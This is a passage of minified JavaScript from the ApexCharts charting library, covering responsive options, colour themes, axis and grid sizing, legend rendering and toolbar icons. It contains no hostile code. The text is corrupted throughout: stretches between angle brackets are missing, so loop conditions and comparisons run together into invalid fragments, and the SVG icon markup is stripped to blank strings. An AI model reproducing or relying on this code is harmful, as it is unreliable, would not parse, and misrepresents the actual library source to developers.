r=a.drawLine(-i,0,e.globals.gridWidth+i,0,n.stroke.color,0,0);r.attr({class:"apexcharts-ycrosshairs-hidden"}),e.globals.dom.elGraphical.add(r)}}]),e}(),te=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w}return u(e,[{key:"checkResponsiveConfig",value:function(e){var 
a=this,n=this.w,i=n.config;if(0!==i.responsive.length){var t=i.responsive.slice();t.sort((function(e,a){return e.breakpoint>a.breakpoint?1:a.breakpoint>e.breakpoint?-1:0})).reverse();var r=new F({}),o=function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{},i=t[0].breakpoint,o=window.innerWidth>0?window.innerWidth:screen.width;if(o>i){var s=A.extendArrayProps(r,n.globals.initialConfig,n);e=k.extend(s,e),e=k.extend(n.config,e),a.overrideResponsiveOptions(e)}else for(var l=0;l0&&"function"==typeof a.config.colors[0]&&(a.globals.colors=a.config.series.map((function(n,i){var t=a.config.colors[i];return t||(t=a.config.colors[0]),"function"==typeof t?(e.isColorFn=!0,t({value:a.globals.axisCharts?a.globals.series[i][0]?a.globals.series[i][0]:0:a.globals.series[i],seriesIndex:i,dataPointIndex:i,w:a})):t})))),a.globals.seriesColors.map((function(e,n){e&&(a.globals.colors[n]=e)})),a.config.theme.monochrome.enabled){var i=[],t=a.globals.series.length;(this.isBarDistributed||this.isHeatmapDistributed)&&(t=a.globals.series[0].length*a.globals.series.length);for(var r=a.config.theme.monochrome.color,o=1/(t/a.config.theme.monochrome.shadeIntensity),s=a.config.theme.monochrome.shadeTo,l=0,u=0;u2&&void 0!==arguments[2]?arguments[2]:null,i=this.w,t=a||i.globals.series.length;if(null===n&&(n=this.isBarDistributed||this.isHeatmapDistributed||"heatmap"===i.config.chart.type&&i.config.plotOptions.heatmap.colorScale.inverse),n&&i.globals.series.length&&(t=i.globals.series[i.globals.maxValsInArrayIndex].length*i.globals.series.length),e.lengthe.globals.svgWidth&&(this.dCtx.lgRect.width=e.globals.svgWidth/1.5),this.dCtx.lgRect}},{key:"getLargestStringFromMultiArr",value:function(e,a){var n=e;if(this.w.globals.isMultiLineX){var i=a.map((function(e,a){return Array.isArray(e)?e.length:1})),t=Math.max.apply(Math,v(i));n=a[i.indexOf(t)]}return n}}]),e}(),le=function(){function e(a){s(this,e),this.w=a.w,this.dCtx=a}return u(e,[{key:"getxAxisLabelsCoords",value:function(){var e,a=this.w,n=a.globals.labels.slice();if(a.config.xaxis.convertedCatToNumeric&&0===n.length&&(n=a.globals.categoryLabels),a.globals.timescaleLabels.length>0){var i=this.getxAxisTimeScaleLabelsCoords();e={width:i.width,height:i.height},a.globals.rotateXLabels=!1}else{this.dCtx.lgWidthForSideLegends="left"!==a.config.legend.position&&"right"!==a.config.legend.position||a.config.legend.floating?0:this.dCtx.lgRect.width;var t=a.globals.xLabelFormatter,r=k.getLargestStringFromArr(n),o=this.dCtx.dimHelpers.getLargestStringFromMultiArr(r,n);a.globals.isBarHorizontal&&(o=r=a.globals.yAxisScale[0].result.reduce((function(e,a){return e.length>a.length?e:a}),0));var s=new J(this.dCtx.ctx),l=r;r=s.xLabelFormat(t,r,l,{i:void 0,dateFormatter:new H(this.dCtx.ctx).formatDate,w:a}),o=s.xLabelFormat(t,o,l,{i:void 0,dateFormatter:new H(this.dCtx.ctx).formatDate,w:a}),(a.config.xaxis.convertedCatToNumeric&&void 0===r||""===String(r).trim())&&(o=r="1");var u=new S(this.dCtx.ctx),c=u.getTextRects(r,a.config.xaxis.labels.style.fontSize),d=c;if(r!==o&&(d=u.getTextRects(o,a.config.xaxis.labels.style.fontSize)),(e={width:c.width>=d.width?c.width:d.width,height:c.height>=d.height?c.height:d.height}).width*n.length>a.globals.svgWidth-this.dCtx.lgWidthForSideLegends-this.dCtx.yAxisWidth-this.dCtx.gridPad.left-this.dCtx.gridPad.right&&0!==a.config.xaxis.labels.rotate||a.config.xaxis.labels.rotateAlways){if(!a.globals.isBarHorizontal){a.globals.rotateXLabels=!0;var h=function(e){return 
u.getTextRects(e,a.config.xaxis.labels.style.fontSize,a.config.xaxis.labels.style.fontFamily,"rotate(".concat(a.config.xaxis.labels.rotate," 0 0)"),!1)};c=h(r),r!==o&&(d=h(o)),e.height=(c.height>d.height?c.height:d.height)/1.5,e.width=c.width>d.width?c.width:d.width}}else a.globals.rotateXLabels=!1}return a.config.xaxis.labels.show||(e={width:0,height:0}),{width:e.width,height:e.height}}},{key:"getxAxisGroupLabelsCoords",value:function(){var e,a=this.w;if(!a.globals.hasGroups)return{width:0,height:0};var n,i=(null===(e=a.config.xaxis.group.style)||void 0===e?void 0:e.fontSize)||a.config.xaxis.labels.style.fontSize,t=a.globals.groups.map((function(e){return e.title})),r=k.getLargestStringFromArr(t),o=this.dCtx.dimHelpers.getLargestStringFromMultiArr(r,t),s=new S(this.dCtx.ctx),l=s.getTextRects(r,i),u=l;return r!==o&&(u=s.getTextRects(o,i)),n={width:l.width>=u.width?l.width:u.width,height:l.height>=u.height?l.height:u.height},a.config.xaxis.labels.show||(n={width:0,height:0}),{width:n.width,height:n.height}}},{key:"getxAxisTitleCoords",value:function(){var e=this.w,a=0,n=0;if(void 0!==e.config.xaxis.title.text){var i=new S(this.dCtx.ctx).getTextRects(e.config.xaxis.title.text,e.config.xaxis.title.style.fontSize);a=i.width,n=i.height}return{width:a,height:n}}},{key:"getxAxisTimeScaleLabelsCoords",value:function(){var e,a=this.w;this.dCtx.timescaleLabels=a.globals.timescaleLabels.slice();var n=this.dCtx.timescaleLabels.map((function(e){return e.value})),i=n.reduce((function(e,a){return void 0===e?(console.error("You have possibly supplied invalid Date format. Please supply a valid JavaScript Date"),0):e.length>a.length?e:a}),0);return 1.05*(e=new S(this.dCtx.ctx).getTextRects(i,a.config.xaxis.labels.style.fontSize)).width*n.length>a.globals.gridWidth&&0!==a.config.xaxis.labels.rotate&&(a.globals.overlappingXLabels=!0),e}},{key:"additionalPaddingXLabels",value:function(e){var a=this,n=this.w,i=n.globals,t=n.config,r=t.xaxis.type,o=e.width;i.skipLastTimelinelabel=!1,i.skipFirstTimelinelabel=!1;var s=n.config.yaxis[0].opposite&&n.globals.isBarHorizontal,l=function(e,s){(function(e){return-1!==i.collapsedSeriesIndices.indexOf(e)})(s)||function(e){if(a.dCtx.timescaleLabels&&a.dCtx.timescaleLabels.length){var s=a.dCtx.timescaleLabels[0],l=a.dCtx.timescaleLabels[a.dCtx.timescaleLabels.length-1].position+o/1.75-a.dCtx.yAxisWidthRight,u=s.position-o/1.75+a.dCtx.yAxisWidthLeft,c="right"===n.config.legend.position&&a.dCtx.lgRect.width>0?a.dCtx.lgRect.width:0;l>i.svgWidth-i.translateX-c&&(i.skipLastTimelinelabel=!0),u<-(e.show&&!e.floating||"bar"!==t.chart.type&&"candlestick"!==t.chart.type&&"rangeBar"!==t.chart.type&&"boxPlot"!==t.chart.type?10:o/1.75)&&(i.skipFirstTimelinelabel=!0)}else"datetime"===r?a.dCtx.gridPad.rightString(s.niceMax).length?c:s.niceMax,h=u(d,{seriesIndex:o,dataPointIndex:-1,w:a}),p=h;if(void 0!==h&&0!==h.length||(h=d),a.globals.isBarHorizontal){i=0;var m=a.globals.labels.slice();h=u(h=k.getLargestStringFromArr(m),{seriesIndex:o,dataPointIndex:-1,w:a}),p=e.dCtx.dimHelpers.getLargestStringFromMultiArr(h,m)}var f=new S(e.dCtx.ctx),v="rotate(".concat(r.labels.rotate," 0 0)"),g=f.getTextRects(h,r.labels.style.fontSize,r.labels.style.fontFamily,v,!1),b=g;h!==p&&(b=f.getTextRects(p,r.labels.style.fontSize,r.labels.style.fontFamily,v,!1)),n.push({width:(l>b.width||l>g.width?l:b.width>g.width?b.width:g.width)+i,height:b.height>g.height?b.height:g.height})}else n.push({width:0,height:0})})),n}},{key:"getyAxisTitleCoords",value:function(){var e=this,a=this.w,n=[];return 
a.config.yaxis.map((function(a,i){if(a.show&&void 0!==a.title.text){var t=new S(e.dCtx.ctx),r="rotate(".concat(a.title.rotate," 0 0)"),o=t.getTextRects(a.title.text,a.title.style.fontSize,a.title.style.fontFamily,r,!1);n.push({width:o.width,height:o.height})}else n.push({width:0,height:0})})),n}},{key:"getTotalYAxisWidth",value:function(){var e=this.w,a=0,n=0,i=0,t=e.globals.yAxisScale.length>1?10:0,r=new W(this.dCtx.ctx),o=function(o,s){var l=e.config.yaxis[s].floating,u=0;o.width>0&&!l?(u=o.width+t,function(a){return e.globals.ignoreYAxisIndexes.indexOf(a)>-1}(s)&&(u=u-o.width-t)):u=l||r.isYAxisHidden(s)?0:5,e.config.yaxis[s].opposite?i+=u:n+=u,a+=u};return e.globals.yLabelsCoords.map((function(e,a){o(e,a)})),e.globals.yTitleCoords.map((function(e,a){o(e,a)})),e.globals.isBarHorizontal&&!e.config.yaxis[0].floating&&(a=e.globals.yLabelsCoords[0].width+e.globals.yTitleCoords[0].width+15),this.dCtx.yAxisWidthLeft=n,this.dCtx.yAxisWidthRight=i,a}}]),e}(),ce=function(){function e(a){s(this,e),this.w=a.w,this.dCtx=a}return u(e,[{key:"gridPadForColumnsInNumericAxis",value:function(e){var a=this.w;if(a.globals.noData||a.globals.allSeriesCollapsed)return 0;var n=function(e){return"bar"===e||"rangeBar"===e||"candlestick"===e||"boxPlot"===e},i=a.config.chart.type,t=0,r=n(i)?a.config.series.length:1;if(a.globals.comboBarCount>0&&(r=a.globals.comboBarCount),a.globals.collapsedSeries.forEach((function(e){n(e.type)&&(r-=1)})),a.config.chart.stacked&&(r=1),(n(i)||a.globals.comboBarCount>0)&&a.globals.isXNumeric&&!a.globals.isBarHorizontal&&r>0){var o,s,l=Math.abs(a.globals.initialMaxX-a.globals.initialMinX);l<=3&&(l=a.globals.dataPoints),o=l/e,a.globals.minXDiff&&a.globals.minXDiff/o>0&&(s=a.globals.minXDiff/o),s>e/2&&(s/=2),(t=s/r*parseInt(a.config.plotOptions.bar.columnWidth,10)/100)<1&&(t=1),t=t/(r>1?1:1.5)+5,a.globals.barPadForNumericAxis=t}return t}},{key:"gridPadFortitleSubtitle",value:function(){var e=this,a=this.w,n=a.globals,i=this.dCtx.isSparkline||!a.globals.axisCharts?0:10;["title","subtitle"].forEach((function(n){void 0!==a.config[n].text?i+=a.config[n].margin:i+=e.dCtx.isSparkline||!a.globals.axisCharts?0:5})),!a.config.legend.show||"bottom"!==a.config.legend.position||a.config.legend.floating||a.globals.axisCharts||(i+=10);var t=this.dCtx.dimHelpers.getTitleSubtitleCoords("title"),r=this.dCtx.dimHelpers.getTitleSubtitleCoords("subtitle");n.gridHeight=n.gridHeight-t.height-r.height-i,n.translateY=n.translateY+t.height+r.height+i}},{key:"setGridXPosForDualYAxis",value:function(e,a){var n=this.w,i=new W(this.dCtx.ctx);n.config.yaxis.map((function(t,r){-1!==n.globals.ignoreYAxisIndexes.indexOf(r)||t.floating||i.isYAxisHidden(r)||(t.opposite&&(n.globals.translateX=n.globals.translateX-(a[r].width+e[r].width)-parseInt(n.config.yaxis[r].labels.style.fontSize,10)/1.2-12),n.globals.translateX<2&&(n.globals.translateX=2))}))}}]),e}(),de=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w,this.lgRect={},this.yAxisWidth=0,this.yAxisWidthLeft=0,this.yAxisWidthRight=0,this.xAxisHeight=0,this.isSparkline=this.w.config.chart.sparkline.enabled,this.dimHelpers=new se(this),this.dimYAxis=new ue(this),this.dimXAxis=new le(this),this.dimGrid=new ce(this),this.lgWidthForSideLegends=0,this.gridPad=this.w.config.grid.padding,this.xPadRight=0,this.xPadLeft=0}return u(e,[{key:"plotCoords",value:function(){var 
e=this,a=this.w,n=a.globals;this.lgRect=this.dimHelpers.getLegendsRect(),this.isSparkline&&(a.config.markers.discrete.length>0||a.config.markers.size>0)&&Object.entries(this.gridPad).forEach((function(a){var n=function(e,a){return function(e){if(Array.isArray(e))return e}(e)||function(e,a){var n=null==e?null:"undefined"!=typeof Symbol&&e[Symbol.iterator]||e["@@iterator"];if(null!=n){var i,t,r=[],o=!0,s=!1;try{for(n=n.call(e);!(o=(i=n.next()).done)&&(r.push(i.value),!a||r.length!==a);o=!0);}catch(e){s=!0,t=e}finally{try{o||null==n.return||n.return()}finally{if(s)throw t}}return r}}(e,a)||g(e,a)||function(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}()}(a,2),i=n[0],t=n[1];e.gridPad[i]=Math.max(t,e.w.globals.markers.largestSize/1.5)})),n.axisCharts?this.setDimensionsForAxisCharts():this.setDimensionsForNonAxisCharts(),this.dimGrid.gridPadFortitleSubtitle(),n.gridHeight=n.gridHeight-this.gridPad.top-this.gridPad.bottom,n.gridWidth=n.gridWidth-this.gridPad.left-this.gridPad.right-this.xPadRight-this.xPadLeft;var i=this.dimGrid.gridPadForColumnsInNumericAxis(n.gridWidth);n.gridWidth=n.gridWidth-2*i,n.translateX=n.translateX+this.gridPad.left+this.xPadLeft+(i>0?i+4:0),n.translateY=n.translateY+this.gridPad.top}},{key:"setDimensionsForAxisCharts",value:function(){var e=this,a=this.w,n=a.globals,i=this.dimYAxis.getyAxisLabelsCoords(),t=this.dimYAxis.getyAxisTitleCoords();a.globals.yLabelsCoords=[],a.globals.yTitleCoords=[],a.config.yaxis.map((function(e,n){a.globals.yLabelsCoords.push({width:i[n].width,index:n}),a.globals.yTitleCoords.push({width:t[n].width,index:n})})),this.yAxisWidth=this.dimYAxis.getTotalYAxisWidth();var r=this.dimXAxis.getxAxisLabelsCoords(),o=this.dimXAxis.getxAxisGroupLabelsCoords(),s=this.dimXAxis.getxAxisTitleCoords();this.conditionalChecksForAxisCoords(r,s,o),n.translateXAxisY=a.globals.rotateXLabels?this.xAxisHeight/8:-4,n.translateXAxisX=a.globals.rotateXLabels&&a.globals.isXNumeric&&a.config.xaxis.labels.rotate<=-45?-this.xAxisWidth/4:0,a.globals.isBarHorizontal&&(n.rotateXLabels=!1,n.translateXAxisY=parseInt(a.config.xaxis.labels.style.fontSize,10)/1.5*-1),n.translateXAxisY=n.translateXAxisY+a.config.xaxis.labels.offsetY,n.translateXAxisX=n.translateXAxisX+a.config.xaxis.labels.offsetX;var l=this.yAxisWidth,u=this.xAxisHeight;n.xAxisLabelsHeight=this.xAxisHeight-s.height,n.xAxisGroupLabelsHeight=n.xAxisLabelsHeight-r.height,n.xAxisLabelsWidth=this.xAxisWidth,n.xAxisHeight=this.xAxisHeight;var c=10;("radar"===a.config.chart.type||this.isSparkline)&&(l=0,u=n.goldenPadding),this.isSparkline&&(this.lgRect={height:0,width:0}),(this.isSparkline||"treemap"===a.config.chart.type)&&(l=0,u=0,c=0),this.isSparkline||this.dimXAxis.additionalPaddingXLabels(r);var d=function(){n.translateX=l,n.gridHeight=n.svgHeight-e.lgRect.height-u-(e.isSparkline||"treemap"===a.config.chart.type?0:a.globals.rotateXLabels?10:15),n.gridWidth=n.svgWidth-l};switch("top"===a.config.xaxis.position&&(c=n.xAxisHeight-a.config.xaxis.axisTicks.height-5),a.config.legend.position){case"bottom":n.translateY=c,d();break;case"top":n.translateY=this.lgRect.height+c,d();break;case"left":n.translateY=c,n.translateX=this.lgRect.width+l,n.gridHeight=n.svgHeight-u-12,n.gridWidth=n.svgWidth-this.lgRect.width-l;break;case"right":n.translateY=c,n.translateX=l,n.gridHeight=n.svgHeight-u-12,n.gridWidth=n.svgWidth-this.lgRect.width-l-5;break;default:throw new Error("Legend position not 
supported")}this.dimGrid.setGridXPosForDualYAxis(t,i),new $(this.ctx).setYAxisXPosition(i,t)}},{key:"setDimensionsForNonAxisCharts",value:function(){var e=this.w,a=e.globals,n=e.config,i=0;e.config.legend.show&&!e.config.legend.floating&&(i=20);var t="pie"===n.chart.type||"polarArea"===n.chart.type||"donut"===n.chart.type?"pie":"radialBar",r=n.plotOptions[t].offsetY,o=n.plotOptions[t].offsetX;if(!n.legend.show||n.legend.floating)return a.gridHeight=a.svgHeight-n.grid.padding.left+n.grid.padding.right,a.gridWidth=a.gridHeight,a.translateY=r,void(a.translateX=o+(a.svgWidth-a.gridWidth)/2);switch(n.legend.position){case"bottom":a.gridHeight=a.svgHeight-this.lgRect.height-a.goldenPadding,a.gridWidth=a.svgWidth,a.translateY=r-10,a.translateX=o+(a.svgWidth-a.gridWidth)/2;break;case"top":a.gridHeight=a.svgHeight-this.lgRect.height-a.goldenPadding,a.gridWidth=a.svgWidth,a.translateY=this.lgRect.height+r+10,a.translateX=o+(a.svgWidth-a.gridWidth)/2;break;case"left":a.gridWidth=a.svgWidth-this.lgRect.width-i,a.gridHeight="auto"!==n.chart.height?a.svgHeight:a.gridWidth,a.translateY=r,a.translateX=o+this.lgRect.width+i;break;case"right":a.gridWidth=a.svgWidth-this.lgRect.width-i-5,a.gridHeight="auto"!==n.chart.height?a.svgHeight:a.gridWidth,a.translateY=r,a.translateX=o+10;break;default:throw new Error("Legend position not supported")}}},{key:"conditionalChecksForAxisCoords",value:function(e,a,n){var i=this.w,t=i.globals.hasGroups?2:1,r=n.height+e.height+a.height,o=i.globals.isMultiLineX?1.2:i.globals.LINE_HEIGHT_RATIO,s=i.globals.rotateXLabels?22:10,l=i.globals.rotateXLabels&&"bottom"===i.config.legend.position?10:0;this.xAxisHeight=r*o+t*s+l,this.xAxisWidth=e.width,this.xAxisHeight-a.height>i.config.xaxis.labels.maxHeight&&(this.xAxisHeight=i.config.xaxis.labels.maxHeight),i.config.xaxis.labels.minHeight&&this.xAxisHeightc&&(this.yAxisWidth=c)}}]),e}(),he=function(){function e(a){s(this,e),this.w=a.w,this.lgCtx=a}return u(e,[{key:"getLegendStyles",value:function(){var e=document.createElement("style");e.setAttribute("type","text/css");var a=document.createTextNode("\t\n \t\n .apexcharts-legend {\t\n display: flex;\t\n overflow: auto;\t\n padding: 0 10px;\t\n }\t\n .apexcharts-legend.apx-legend-position-bottom, .apexcharts-legend.apx-legend-position-top {\t\n flex-wrap: wrap\t\n }\t\n .apexcharts-legend.apx-legend-position-right, .apexcharts-legend.apx-legend-position-left {\t\n flex-direction: column;\t\n bottom: 0;\t\n }\t\n .apexcharts-legend.apx-legend-position-bottom.apexcharts-align-left, .apexcharts-legend.apx-legend-position-top.apexcharts-align-left, .apexcharts-legend.apx-legend-position-right, .apexcharts-legend.apx-legend-position-left {\t\n justify-content: flex-start;\t\n }\t\n .apexcharts-legend.apx-legend-position-bottom.apexcharts-align-center, .apexcharts-legend.apx-legend-position-top.apexcharts-align-center {\t\n justify-content: center; \t\n }\t\n .apexcharts-legend.apx-legend-position-bottom.apexcharts-align-right, .apexcharts-legend.apx-legend-position-top.apexcharts-align-right {\t\n justify-content: flex-end;\t\n }\t\n .apexcharts-legend-series {\t\n cursor: pointer;\t\n line-height: normal;\t\n }\t\n .apexcharts-legend.apx-legend-position-bottom .apexcharts-legend-series, .apexcharts-legend.apx-legend-position-top .apexcharts-legend-series{\t\n display: flex;\t\n align-items: center;\t\n }\t\n .apexcharts-legend-text {\t\n position: relative;\t\n font-size: 14px;\t\n }\t\n .apexcharts-legend-text *, .apexcharts-legend-marker * {\t\n pointer-events: none;\t\n }\t\n 
.apexcharts-legend-marker {\t\n position: relative;\t\n display: inline-block;\t\n cursor: pointer;\t\n margin-right: 3px;\t\n border-style: solid;\n }\t\n \t\n .apexcharts-legend.apexcharts-align-right .apexcharts-legend-series, .apexcharts-legend.apexcharts-align-left .apexcharts-legend-series{\t\n display: inline-block;\t\n }\t\n .apexcharts-legend-series.apexcharts-no-click {\t\n cursor: auto;\t\n }\t\n .apexcharts-legend .apexcharts-hidden-zero-series, .apexcharts-legend .apexcharts-hidden-null-series {\t\n display: none !important;\t\n }\t\n .apexcharts-inactive-legend {\t\n opacity: 0.45;\t\n }");return e.appendChild(a),e}},{key:"getLegendBBox",value:function(){var e=this.w.globals.dom.baseEl.querySelector(".apexcharts-legend").getBoundingClientRect(),a=e.width;return{clwh:e.height,clww:a}}},{key:"appendToForeignObject",value:function(){var e=this.w.globals;e.dom.elLegendForeign=document.createElementNS(e.SVGNS,"foreignObject");var a=e.dom.elLegendForeign;a.setAttribute("x",0),a.setAttribute("y",0),a.setAttribute("width",e.svgWidth),a.setAttribute("height",e.svgHeight),e.dom.elLegendWrap.setAttribute("xmlns","http://www.w3.org/1999/xhtml"),a.appendChild(e.dom.elLegendWrap),a.appendChild(this.getLegendStyles()),e.dom.Paper.node.insertBefore(a,e.dom.elGraphical.node)}},{key:"toggleDataSeries",value:function(e,a){var n=this,i=this.w;if(i.globals.axisCharts||"radialBar"===i.config.chart.type){i.globals.resized=!0;var t=null,r=null;i.globals.risingSeries=[],i.globals.axisCharts?(t=i.globals.dom.baseEl.querySelector(".apexcharts-series[data\\:realIndex='".concat(e,"']")),r=parseInt(t.getAttribute("data:realIndex"),10)):(t=i.globals.dom.baseEl.querySelector(".apexcharts-series[rel='".concat(e+1,"']")),r=parseInt(t.getAttribute("rel"),10)-1),a?[{cs:i.globals.collapsedSeries,csi:i.globals.collapsedSeriesIndices},{cs:i.globals.ancillaryCollapsedSeries,csi:i.globals.ancillaryCollapsedSeriesIndices}].forEach((function(e){n.riseCollapsedSeries(e.cs,e.csi,r)})):this.hideSeries({seriesEl:t,realIndex:r})}else{var o=i.globals.dom.Paper.select(" .apexcharts-series[rel='".concat(e+1,"'] path")),s=i.config.chart.type;if("pie"===s||"polarArea"===s||"donut"===s){var l=i.config.plotOptions.pie.donut.labels;new S(this.lgCtx.ctx).pathMouseDown(o.members[0],null),this.lgCtx.ctx.pie.printDataLabelsInner(o.members[0].node,l)}o.fire("click")}}},{key:"hideSeries",value:function(e){var a=e.seriesEl,n=e.realIndex,i=this.w,t=k.clone(i.config.series);if(i.globals.axisCharts){var r=!1;if(i.config.yaxis[n]&&i.config.yaxis[n].show&&i.config.yaxis[n].showAlways&&(r=!0,i.globals.ancillaryCollapsedSeriesIndices.indexOf(n)<0&&(i.globals.ancillaryCollapsedSeries.push({index:n,data:t[n].data.slice(),type:a.parentNode.className.baseVal.split("-")[1]}),i.globals.ancillaryCollapsedSeriesIndices.push(n))),!r){i.globals.collapsedSeries.push({index:n,data:t[n].data.slice(),type:a.parentNode.className.baseVal.split("-")[1]}),i.globals.collapsedSeriesIndices.push(n);var o=i.globals.risingSeries.indexOf(n);i.globals.risingSeries.splice(o,1)}}else i.globals.collapsedSeries.push({index:n,data:t[n]}),i.globals.collapsedSeriesIndices.push(n);for(var s=a.childNodes,l=0;l0){for(var r=0;r-1&&(e[i].data=[])})):e.forEach((function(n,i){a.globals.collapsedSeriesIndices.indexOf(i)>-1&&(e[i]=0)})),e}}]),e}(),pe=function(){function 
e(a,n){s(this,e),this.ctx=a,this.w=a.w,this.onLegendClick=this.onLegendClick.bind(this),this.onLegendHovered=this.onLegendHovered.bind(this),this.isBarsDistributed="bar"===this.w.config.chart.type&&this.w.config.plotOptions.bar.distributed&&1===this.w.config.series.length,this.legendHelpers=new he(this)}return u(e,[{key:"init",value:function(){var e=this.w,a=e.globals,n=e.config;if((n.legend.showForSingleSeries&&1===a.series.length||this.isBarsDistributed||a.series.length>1||!a.axisCharts)&&n.legend.show){for(;a.dom.elLegendWrap.firstChild;)a.dom.elLegendWrap.removeChild(a.dom.elLegendWrap.firstChild);this.drawLegends(),k.isIE11()?document.getElementsByTagName("head")[0].appendChild(this.legendHelpers.getLegendStyles()):this.legendHelpers.appendToForeignObject(),"bottom"===n.legend.position||"top"===n.legend.position?this.legendAlignHorizontal():"right"!==n.legend.position&&"left"!==n.legend.position||this.legendAlignVertical()}}},{key:"drawLegends",value:function(){var e=this,a=this.w,n=a.config.legend.fontFamily,i=a.globals.seriesNames,t=a.globals.colors.slice();if("heatmap"===a.config.chart.type){var r=a.config.plotOptions.heatmap.colorScale.ranges;i=r.map((function(e){return e.name?e.name:e.from+" - "+e.to})),t=r.map((function(e){return e.color}))}else this.isBarsDistributed&&(i=a.globals.labels.slice());a.config.legend.customLegendItems.length&&(i=a.config.legend.customLegendItems);for(var o=a.globals.legendFormatter,s=a.config.legend.inverseOrder,l=s?i.length-1:0;s?l>=0:l<=i.length-1;s?l--:l++){var u=o(i[l],{seriesIndex:l,w:a}),c=!1,d=!1;if(a.globals.collapsedSeries.length>0)for(var h=0;h0)for(var p=0;p0?l-10:0)+(u>0?u-10:0)}i.style.position="absolute",r=r+e+n.config.legend.offsetX,o=o+a+n.config.legend.offsetY,i.style.left=r+"px",i.style.top=o+"px","bottom"===n.config.legend.position?(i.style.top="auto",i.style.bottom=5-n.config.legend.offsetY+"px"):"right"===n.config.legend.position&&(i.style.left="auto",i.style.right=25+n.config.legend.offsetX+"px"),["width","height"].forEach((function(e){i.style[e]&&(i.style[e]=parseInt(n.config.legend[e],10)+"px")}))}},{key:"legendAlignHorizontal",value:function(){var e=this.w;e.globals.dom.baseEl.querySelector(".apexcharts-legend").style.right=0;var a=this.legendHelpers.getLegendBBox(),n=new de(this.ctx),i=n.dimHelpers.getTitleSubtitleCoords("title"),t=n.dimHelpers.getTitleSubtitleCoords("subtitle"),r=0;"bottom"===e.config.legend.position?r=-a.clwh/1.8:"top"===e.config.legend.position&&(r=i.height+t.height+e.config.title.margin+e.config.subtitle.margin-10),this.setLegendWrapXY(20,r)}},{key:"legendAlignVertical",value:function(){var e=this.w,a=this.legendHelpers.getLegendBBox(),n=0;"left"===e.config.legend.position&&(n=20),"right"===e.config.legend.position&&(n=e.globals.svgWidth-a.clww-10),this.setLegendWrapXY(n,20)}},{key:"onLegendHovered",value:function(e){var a=this.w,n=e.target.classList.contains("apexcharts-legend-text")||e.target.classList.contains("apexcharts-legend-marker");if("heatmap"===a.config.chart.type||this.isBarsDistributed){if(n){var i=parseInt(e.target.getAttribute("rel"),10)-1;this.ctx.events.fireEvent("legendHover",[this.ctx,i,this.w]),new K(this.ctx).highlightRangeInSeries(e,e.target)}}else!e.target.classList.contains("apexcharts-inactive-legend")&&n&&new K(this.ctx).toggleSeriesOnHover(e,e.target)}},{key:"onLegendClick",value:function(e){var a=this.w;if(!a.config.legend.customLegendItems.length&&(e.target.classList.contains("apexcharts-legend-text")||e.target.classList.contains("apexcharts-legend-marker"))){var 
n=parseInt(e.target.getAttribute("rel"),10)-1,i="true"===e.target.getAttribute("data:collapsed"),t=this.w.config.chart.events.legendClick;"function"==typeof t&&t(this.ctx,n,this.w),this.ctx.events.fireEvent("legendClick",[this.ctx,n,this.w]);var r=this.w.config.legend.markers.onClick;"function"==typeof r&&e.target.classList.contains("apexcharts-legend-marker")&&(r(this.ctx,n,this.w),this.ctx.events.fireEvent("legendMarkerClick",[this.ctx,n,this.w])),"treemap"!==a.config.chart.type&&"heatmap"!==a.config.chart.type&&!this.isBarsDistributed&&a.config.legend.onItemClick.toggleDataSeries&&this.legendHelpers.toggleDataSeries(n,i)}}}]),e}(),me=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w;var n=this.w;this.ev=this.w.config.chart.events,this.selectedClass="apexcharts-selected",this.localeValues=this.w.globals.locale.toolbar,this.minX=n.globals.minX,this.maxX=n.globals.maxX}return u(e,[{key:"createToolbar",value:function(){var e=this,a=this.w,n=function(){return document.createElement("div")},i=n();if(i.setAttribute("class","apexcharts-toolbar"),i.style.top=a.config.chart.toolbar.offsetY+"px",i.style.right=3-a.config.chart.toolbar.offsetX+"px",a.globals.dom.elWrap.appendChild(i),this.elZoom=n(),this.elZoomIn=n(),this.elZoomOut=n(),this.elPan=n(),this.elSelection=n(),this.elZoomReset=n(),this.elMenuIcon=n(),this.elMenu=n(),this.elCustomIcons=[],this.t=a.config.chart.toolbar.tools,Array.isArray(this.t.customIcons))for(var t=0;t\n \n \n\n'),o("zoomOut",this.elZoomOut,'\n \n \n\n');var s=function(n){e.t[n]&&a.config.chart[n].enabled&&r.push({el:"zoom"===n?e.elZoom:e.elSelection,icon:"string"==typeof e.t[n]?e.t[n]:"zoom"===n?'\n \n \n \n':'\n \n \n',title:e.localeValues["zoom"===n?"selectionZoom":"selection"],class:a.globals.isTouchDevice?"apexcharts-element-hidden":"apexcharts-".concat(n,"-icon")})};s("zoom"),s("selection"),this.t.pan&&a.config.chart.zoom.enabled&&r.push({el:this.elPan,icon:"string"==typeof this.t.pan?this.t.pan:'\n \n \n \n \n \n \n \n',title:this.localeValues.pan,class:a.globals.isTouchDevice?"apexcharts-element-hidden":"apexcharts-pan-icon"}),o("reset",this.elZoomReset,'\n \n \n'),this.t.download&&r.push({el:this.elMenuIcon,icon:"string"==typeof this.t.download?this.t.download:'',title:this.localeValues.menu,class:"apexcharts-menu-icon"});for(var l=0;l0&&a.height>0&&this.slDraggableRect.selectize({points:"l, r",pointSize:8,pointType:"rect"}).resize({constraint:{minX:0,minY:0,maxX:e.globals.gridWidth,maxY:e.globals.gridHeight}}).on("resizing",this.selectionDragging.bind(this,"resizing"))}}},{key:"preselectedSelection",value:function(){var e=this.w,a=this.xyRatios;if(!e.globals.zoomEnabled)if(void 0!==e.globals.selection&&null!==e.globals.selection)this.drawSelectionRect(e.globals.selection);else if(void 0!==e.config.chart.selection.xaxis.min&&void 0!==e.config.chart.selection.xaxis.max){var n=(e.config.chart.selection.xaxis.min-e.globals.minX)/a.xRatio,i={x:n,y:0,width:e.globals.gridWidth-(e.globals.maxX-e.config.chart.selection.xaxis.max)/a.xRatio-n,height:e.globals.gridHeight,translateX:0,translateY:0,selectionEnabled:!0};this.drawSelectionRect(i),this.makeSelectionRectDraggable(),"function"==typeof e.config.chart.events.selection&&e.config.chart.events.selection(this.ctx,{xaxis:{min:e.config.chart.selection.xaxis.min,max:e.config.chart.selection.xaxis.max},yaxis:{}})}}},{key:"drawSelectionRect",value:function(e){var a=e.x,n=e.y,i=e.width,t=e.height,r=e.translateX,o=void 